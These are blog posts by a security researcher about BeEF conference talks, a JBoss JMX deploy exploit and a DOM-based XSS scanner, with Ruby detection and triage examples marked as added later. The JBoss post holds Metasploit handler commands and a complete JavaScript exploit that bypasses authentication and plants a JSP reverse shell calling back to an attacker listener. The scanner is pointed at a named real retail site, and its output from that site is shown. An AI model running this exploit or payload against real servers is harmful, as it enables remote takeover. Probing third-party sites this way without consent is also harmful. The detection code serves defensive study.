Meet BeEF at DeepSec 2011
euronymous — 11 October, 2011 - 09:14
After a couple of months of blog hibernation, I'm here again to write down my thoughts.
The last few months have been pretty busy with conferences, work and BeEF development.
I spoke at SecurityByte 2011 (Bangalore, India), having a lot of fun with Nish Bhalla, Ashim (NullCon organizer),
the guys from ClubHack, my colleague Lava @lavakumark, Krzysztof @kkotowicz, and the Russian friends Alexander @sh2kerr and Dmitriy @evdokimovds. The food was great (chicken curry, very hot and spicy) and the venue was fantastic.
After a couple of weeks I was invited to speak at Hacktivity 2011 (Budapest, Hungary). The fun was assured thanks to my friends Raoul Chiesa, Mate Soos, FluxFelix @flxflx and the crew from CONFidence who came from Warsaw to party with us. My talk was followed by many, many people in the main room, so I was definitely happy :-)
This year's conference schedule has been quite tight, with the fourth conference as a speaker in 1 month.
On 17-18 November, DeepSec 2011 will be held in Vienna, Austria. DeepSec is one of the largest security conferences in Europe and is famous for the usual high quality of its talks. The trainings are usually very good too. Pity that Saumil Shah's training on low-level exploitation will not be present this year (but let's hope for next year).
As usual, the cool DeepSec crew writes a blog entry for every talk, to give more information to the attendees and explain the cryptic abstracts of the talks in a human-readable way.
As you can read here in the DeepSec blog, I will speak about BeEF (yet another time :),
covering the latest development we're doing on Chrome Extensions exploitation, Internal Network Fingerprinting and Exploitation, as well as a little preview of LAMBs (yep, as you can see we love animal acronyms :). Think of them as bots/drones deployed by BeEF in the internal network that communicate back with the BeEF framework. I know the info is pretty abstract for now, but let's keep the good stuff for DeepSec :-)
My BeEF talk at CONFidence 2011
euronymous — 30 May, 2011 - 12:24
I'm back from CONFidence 2011 and PH-Neutral: I've enjoyed these hacking and alcohol events a lot.
The guys from CONFidence worked really hard to organize the conference, and everything went the right way:
we speakers were picked up at the airport/train station by the CONFidence crew and enjoyed the free speaker dinners,
free speaker alcohol and other things :-)
Below are the slides and the screencast demo of my talk about BeEF: thanks to every attendee (especially Mario @0x6D6172696F Heiderich - again, your book is fantastic, thanks from Mr. BeEF :) - and Krzysztof @kkotowicz Kotowicz, who were in the first row and suggested new features/improvements).
Jboss 6.0.0M1 JMX Deploy Exploit: the BeEF way... from Michele "antisnatchor" Orru' on Vimeo.
Looking forward to the next CONFidence...
JBoss JMX Deploy Exploit
euronymous — 4 May, 2011 - 16:12
It works pretty nicely, and bypasses authentication via a HEAD request.
I've also added it to BeEF; take a look at it here: http://code.google.com/p/beef/source/detail?r=951
Before launching it, either this version or the BeEF one, remember to fire up your Metasploit multi/handler:
msf > use exploit/multi/handler
msf exploit(handler) > set payload java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
msf exploit(handler) > set lhost 192.168.1.2
lhost => 192.168.1.2
msf exploit(handler) > set lport 6666
lport => 6666
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.2:6666
[*] Starting the payload handler...
Here is the plain JavaScript version, using jQuery to issue the XHRs:
<html>
<head>
  <script src="./jquery-1.5.2.min.js" type="text/javascript"></script>
</head>
<body>
<h1>Jboss 6.0.0M1 JMX Deploy Exploit</h1>
<br>author: Michele "antisnatchor" Orru'
<!--
 * Jboss 6.0.0M1 JMX Upload Exploit
 * Should also work on Jboss 5.1.0 and 4.x versions
 *
 * Ported from l33tb0y's Ruby code to JavaScript by antisnatchor.
 * HEAD request with malicious JSP -> sleep 10 secs -> GET request to deployed JSP -> reverse connection to listening MSF handler
 *
 * Please note that this is a variation of the JBoss exploits in Metasploit: instead of deploying a WAR, it directly deploys a JSP reverse shell
-->
<div class="output"></div>
<script type="text/javascript">
function randomString(len, charSet) {
  charSet = charSet || 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
  var randomString = '';
  for (var i = 0; i < len; i++) {
    var randomPoz = Math.floor(Math.random() * charSet.length);
    randomString += charSet.substring(randomPoz, randomPoz + 1);
  }
  return randomString;
}
// Target JBoss host/port and Metasploit multi/handler listener
var rhost = "127.0.0.1";   // target host
var rport = "8080";        // target port
var lhost = "192.168.1.2"; // MSF handler listener host
var lport = "6666";        // MSF handler listener port
var command = "cmd.exe";   // command to be executed by Runtime.getRuntime().exec()
// URL-encoded JSP reverse shell: connects back to lhost:lport and pipes the command's stdin/stdout through the socket
var payload = "%3C%25@page%20import=%22java.lang.*%22%25%3E%20%3C%25@page%20import=%22java.util.*%22%25%3E%20%3C%25@page%20import=%22java.io.*%22%25%3E%20%3C%25@page%20import=%22java.net.*%22%25%3E%20%3C%25%20class%20StreamConnector%20extends%20Thread%20%7B%20InputStream%20is;%20OutputStream%20os;%20StreamConnector(%20InputStream%20is,%20OutputStream%20os%20)%20%7B%20this.is%20=%20is;%20this.os%20=%20os;%20%7D%20public%20void%20run()%20%7B%20BufferedReader%20in%20%20=%20null;%20BufferedWriter%20out%20=%20null;%20try%20%7B%20in%20%20=%20new%20BufferedReader(%20new%20InputStreamReader(%20this.is%20)%20);%20out%20=%20new%20BufferedWriter(%20new%20OutputStreamWriter(%20this.os%20)%20);%20char%20buffer[]%20=%20new%20char[8192];%20int%20length;%20while(%20(%20length%20=%20in.read(%20buffer,%200,%20buffer.length%20)%20)%20%3E%200%20)%20%7B%20out.write(%20buffer,%200,%20length%20);%20out.flush();%20%7D%20%7D%20catch(%20Exception%20e%20)%7B%7D%20try%20%7B%20if(%20in%20!=%20null%20)%20in.close();%20if(%20out%20!=%20null%20)%20out.close();%20%7D%20catch(%20Exception%20e%20)%7B%7D%20%7D%20%7D%20try%20%7B%20Socket%20socket%20=%20new%20Socket(%20%22" + lhost + "%22,%20" + lport + "%20);%20Process%20process%20=%20Runtime.getRuntime().exec(%20%22" + command + "%22%20);%20(%20new%20StreamConnector(%20process.getInputStream(),%20socket.getOutputStream()%20)%20).start();%20(%20new%20StreamConnector(%20socket.getInputStream(),%20process.getOutputStream()%20)%20).start();%20%7D%20catch(%20Exception%20e%20)%20%7B%7D%20%25%3E";
var randomJspName = randomString(10);
var uri = "/jmx-console/HtmlAdaptor;index.jsp?" + "action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=%2Fconsole-mgr.sar/web-console.war%2F&arg1=" + randomJspName + "&arg2=.jsp&arg3=" + payload + "&arg4=True";
$('.output').html("<br>[+] Sending HEAD request to Jboss<br>");
$.ajax({
  type: 'HEAD',
  url: 'http://' + rhost + ':' + rport + uri,
  dataType: 'script',
  success: function(data, textStatus, xhr) {
    $('.output').append("<br>[+] Now sleeping for 10 secs before activating the reverse payload <br>");
    function triggerReverseConn() {
      $('.output').append("<br>[+] Sending GET request to http://" + rhost + ":" + rport + "/web-console/" + randomJspName + ".jsp <br>");
      $.ajax({
        type: 'GET',
        url: 'http://' + rhost + ':' + rport + "/web-console/" + randomJspName + ".jsp",
        dataType: 'script',
        success: function(data, textStatus, xhr) {
          $('.output').append("<br>[+] OK: Reverse JSP shell should have been triggered. Check your MSF handler listener. <br>");
        },
        error: function(jqXHR, textStatus, errorThrown) {
          $('.output').append("<br>[+] ERROR: second GET request failed. <br>");
        }
      });
    }
    // sleep 10 secs, then request the deployed JSP
    setTimeout(triggerReverseConn, 10000);
  },
  error: function(jqXHR, textStatus, errorThrown) {
    $('.output').append("<br>[+] ERROR: first HEAD request failed.");
  }
});
</script>
</body>
</html>
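The request sequence this exploit produces (an unauthenticated HEAD to the JMX console invoking DeploymentFileRepository, then a GET to the dropped JSP under /web-console/) is easy to spot in a web-server access log. The following Ruby is an added example, not code from this post or from BeEF: it parses constructed combined-format log lines and flags the three signals a defender would alert on (a verb other than GET/POST answered 2xx by an admin console, an invokeOp on DeploymentFileRepository, and a later request for the freshly deployed JSP name). The log lines, IPs and JSP name are made up for the example.

```ruby
# Added example, not part of the original post: detection logic for the request pattern the
# exploit above produces, run over constructed access-log lines (Apache/Tomcat "combined" format).
require "cgi"

# Constructed sample traffic, not a real capture. Line 3 is the deploy request (HEAD to the JMX
# console invoking DeploymentFileRepository), line 4 the follow-up GET that runs the dropped JSP.
SAMPLE_LOG = <<~LOG
  10.0.0.5 - - [04/May/2011:16:10:01 +0200] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
  10.0.0.5 - - [04/May/2011:16:10:02 +0200] "GET /jmx-console/ HTTP/1.1" 401 0 "-" "Mozilla/5.0"
  10.0.0.5 - - [04/May/2011:16:10:03 +0200] "HEAD /jmx-console/HtmlAdaptor;index.jsp?action=invokeOp&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodIndex=5&arg0=%2Fconsole-mgr.sar/web-console.war%2F&arg1=kXd8Qz1Lwq&arg2=.jsp&arg3=%3C%25%20jsp%20%25%3E&arg4=True HTTP/1.1" 200 - "-" "Mozilla/5.0"
  10.0.0.5 - - [04/May/2011:16:10:13 +0200] "GET /web-console/kXd8Qz1Lwq.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0"
  10.0.0.9 - - [04/May/2011:16:11:00 +0200] "POST /jmx-console/HtmlAdaptor HTTP/1.1" 401 0 "-" "curl/7.21"
LOG

LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>[A-Z]+) (?<target>\S+)[^"]*" (?<status>\d{3}) /
ADMIN_CONSOLE_RE = %r{\A/(jmx-console|web-console|admin-console)(/|;|\z)}
DEPLOYED_JSP_RE = %r{\A/web-console/([^/]+)\z}

Event = Struct.new(:ip, :time, :method, :path, :params, :status)

# Parse one combined-format line into an Event; returns nil for lines that do not match.
def parse_line(line)
  m = LOG_RE.match(line)
  return nil unless m
  path, _, query = m[:target].partition("?")
  # CGI.parse URL-decodes values, so "jboss.admin%3Aservice%3D..." becomes "jboss.admin:service=..."
  params = CGI.parse(query).transform_values(&:first)
  Event.new(m[:ip], m[:time], m[:method], path, params, m[:status].to_i)
end

def jmx_deploy?(ev)
  ev.params["action"] == "invokeOp" &&
    ev.params["name"].to_s.include?("DeploymentFileRepository")
end

# Per-request rules. Returns the list of rule names that fired for this event.
def findings_for(ev)
  out = []
  # Verb tampering: a method other than GET/POST reaching an admin console with a 2xx answer
  # means the console's security constraint did not cover that verb.
  if ADMIN_CONSOLE_RE.match?(ev.path) && !%w[GET POST].include?(ev.method) && ev.status.between?(200, 299)
    out << "verb_tampering"
  end
  # Remote deployment through the DeploymentFileRepository MBean, whatever the HTTP verb.
  out << "jmx_deploy" if jmx_deploy?(ev)
  out
end

# Whole-log pass: per-request rules plus the correlation "a JSP name deployed via JMX was
# later requested under /web-console/", which is the second stage of the exploit above.
# Returns [rule, client_ip, path] triples in log order.
def analyze(log_text)
  alerts = []
  deployed = {} # "<arg1><arg2>" (e.g. "kXd8Qz1Lwq.jsp") => ip that deployed it
  log_text.each_line.map { |l| parse_line(l.strip) }.compact.each do |ev|
    findings_for(ev).each { |rule| alerts << [rule, ev.ip, ev.path] }
    if jmx_deploy?(ev) && ev.params["arg1"]
      deployed[ev.params["arg1"] + ev.params["arg2"].to_s] = ev.ip
    end
    m = DEPLOYED_JSP_RE.match(ev.path)
    alerts << ["deployed_jsp_invoked", ev.ip, ev.path] if m && deployed.key?(m[1])
  end
  alerts
end

if __FILE__ == $0
  analyze(SAMPLE_LOG).each { |rule, ip, path| puts "#{rule}\t#{ip}\t#{path}" }
end
```

Run it directly to print the alerts for the embedded sample. The HEAD trick works when the console's web.xml security-constraint lists only GET and POST in its http-method elements (general JBoss knowledge, not something the post states); removing those elements makes the constraint apply to every verb, and the jmx-console should not be reachable from untrusted networks in the first place.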
Enumerate potential DOM-based XSS vulnerable code
euronymous — 28 April, 2011 - 10:01
The output needs manual verification, but at least it's something.
Thanks .mario and Stefano for your research on the topic. And thanks Michal for the "bugfix" regarding regex :-)
# Given a set of JS/HTML/whatever files, it searches for potential DOM-based XSS
# injection points based on regular expressions from https://code.google.com/p/domxsswiki/wiki/FindingDOMXSS
#
# author: Michele "antisnatchor" Orru' (regex credit goes to Mario ".mario" Heiderich)
# v. 0.1
require "rubygems"
require "net/http"
require "net/https"
require "uri"
require "erb"
require "singleton"

MAIN_URL = 'http://compraonline.mediaworld.it'
MAIN_DOMAIN = 'compraonline.mediaworld.it'
PORT = 80
HTTP_PROXY_HOST = '172.31.229.10'
HTTP_PROXY_PORT = 8888
PATHS_TO_TEST = ['/resources/script/new_hp.js',
                 '/resources/script/commonTop.js',
                 '/resources/script/scripter.js'
]

puts "[+] starting requests to #{MAIN_URL}"
Net::HTTP::Proxy(HTTP_PROXY_HOST, HTTP_PROXY_PORT).start(MAIN_DOMAIN, PORT) {|http|
  PATHS_TO_TEST.each{|path|
    url = URI.parse(MAIN_URL + ':' + PORT.to_s + path)
    req = Net::HTTP::Get.new(url.path)
    http.request(req) do |res|
      line = 1
      response = res.body.to_s.split("\n")
      response.each{|i|
        # apply the DOM-based XSS regexes to each line of the HTTP response, printing lineNumber and lineContent
        # of lines that could potentially be vulnerable to DOM-based XSS (NEEDS MANUAL VERIFICATION!)
        if(i.scan(/((src|href|data|location|code|value|action)\s*["'\]]*\s*\+?\s*=)|((replace|assign|navigate|getResponseHeader|open(Dialog)?|showModalDialog|eval|evaluate|execCommand|execScript|setTimeout|setInterval)\s*["'\]]*\s*\()/).size > 0 ||
           i.scan(/(location\s*[\[.])|([.\[]\s*["']?\s*(arguments|dialogArguments|innerHTML|write(ln)?|open(Dialog)?|showModalDialog|cookie|URL|documentURI|baseURI|referrer|name|opener|parent|top|content|self|frames)\W)|(localStorage|sessionStorage|Database)/).size > 0)
          puts "[#{path}]-#{line}: #{i}"
        end
        line += 1
      }
    end
  }
}
A sample of the output is the following:
[/resources/script/commonTop.js]-104: top.location.href = apUrl;
[/resources/script/commonTop.js]-108: top.location.href = url;
[/resources/script/commonTop.js]-113: document.location.href = "http://" + server + "/webapp/wcs/stores/servlet/ListOrdersView?" +apDefUrl;
[/resources/script/commonTop.js]-117: top.location.href = "http://" + server + "/webapp/wcs/stores/servlet/BrandsView?" + apDefUrl;
[/resources/script/commonTop.js]-124: document.cookie = name + "=" + "; expires=Thu, 01-Jan-70 00:00:01 GMT";
[/resources/script/commonTop.js]-125: top.location.href = "http://" + serverMobi;
[/resources/script/commonTop.js]-127: top.location.href = "http://" + server + "/webapp/wcs/stores/servlet/PartnerVisit?onlyInsert=Y&partnerId=7990000000000006500&storeId=20000&bannerId=home_mwcol&url=compraonline.mediaworld.it/html/LINKPROMO.html?content=/offerte/mobi/sez1.html";
[/resources/script/commonTop.js]-132: document.location.href = "http://" + server + "/webapp/wcs/stores/servlet/ContactUsView?storeId=20000";
[/resources/script/commonTop.js]-136: formObj.searchString.value = formObj.searchString.value.replace(/%/g,"");
[/resources/script/commonTop.js]-138: if( formObj.searchString.value.replace(/^\s+|\s+$/g,"").length < 2 )
[/resources/script/commonTop.js]-149: formObj.categoryId.value = document.getElementById('catGroupId').options[document.getElementById('catGroupId').selectedIndex].value;
[/resources/script/commonTop.js]-156: window.open("http://" + server +"/webapp/wcs/stores/servlet/NewsletterView?" + apDefUrl,"newsletter","width=440,height=354,scrollbars=no,resizable=no");
[/resources/script/scripter.js]-75: this.layer.document.writeln(body[i]);
[/resources/script/scripter.js]-82: this.element.innerHTML = body;
[/resources/script/scripter.js]-88: this.element.innerHTML = body;
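The script above fetches scripts from a live site through a proxy, and its two regexes deliberately cast a wide net (the output shows plain String#replace calls and cookie deletions next to real candidates). As an added example, not the post's code and with simpler regexes than .mario's, the following Ruby applies the same idea offline to embedded JavaScript and goes one step further: it separates source hits (attacker-influenced DOM input) from sink hits (a string becoming markup, code or a navigation) and reports lines carrying both first, so the manual verification the post calls for starts with the likeliest candidates. The sample JavaScript is constructed for the example.

```ruby
# Added example, not the post's script: the same regex-driven DOM XSS triage run offline on
# embedded JavaScript, with hits split into "source" (attacker-influenced input) and "sink"
# (string becomes markup, code or a navigation) so lines carrying both are reviewed first.
# The JavaScript below is constructed for the example.
SAMPLE_JS = <<~'JS'
  var q = location.hash.substring(1);
  document.getElementById("out").innerHTML = q;
  document.write("<b>" + location.search + "</b>");
  eval(window.name);
  top.location.href = "http://" + server + "/webapp/store";
  var ref = document.referrer;
  formObj.searchString.value = formObj.searchString.value.replace(/%/g, "");
  if (location.href == expected) { console.log("ok"); }
JS

# DOM XSS sources: reads of attacker-influenced DOM state. The negative lookahead skips the
# case where the same property is being assigned (that is a navigation sink, not a source).
SOURCE_RE = /\b(location|document\.(URL|documentURI|baseURI|referrer|cookie)|window\.name)\b(?![\w.]*\s*=[^=])/
# DOM XSS sinks: a string assigned into markup/navigation or passed to a code-evaluating call.
# Requiring the trailing "=" or "(" drops reads such as "x = el.innerHTML" and unrelated
# String#replace calls, both of which the post's broader regex reports too.
SINK_RE = /\b(innerHTML|outerHTML|document\.write(ln)?|eval|setTimeout|setInterval|execScript|location(\.(href|assign|replace))?)\s*(\+?=[^=]|\()/

Finding = Struct.new(:line, :kind, :code)

# :both, :sink, :source, or nil for a line with no hit.
def classify_line(code)
  src = SOURCE_RE.match?(code)
  snk = SINK_RE.match?(code)
  return :both if src && snk
  return :sink if snk
  return :source if src
  nil
end

# All hits in a JavaScript text, with 1-based line numbers, in file order.
def scan_js(text)
  text.each_line.with_index(1).map { |code, n|
    kind = classify_line(code)
    Finding.new(n, kind, code.strip) if kind
  }.compact
end

# Line numbers grouped by kind; :both is the set worth verifying by hand first.
def triage(text)
  groups = { both: [], sink: [], source: [] }
  scan_js(text).each { |f| groups[f.kind] << f.line }
  groups
end

if __FILE__ == $0
  scan_js(SAMPLE_JS).each { |f| puts "#{f.line}\t#{f.kind}\t#{f.code}" }
end
```

Like the post's regexes, this is line-based and knows nothing about data flow: a source read on one line and a sink on another still need the reviewer to follow the variable by hand, which is exactly the manual verification step the post mentions.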
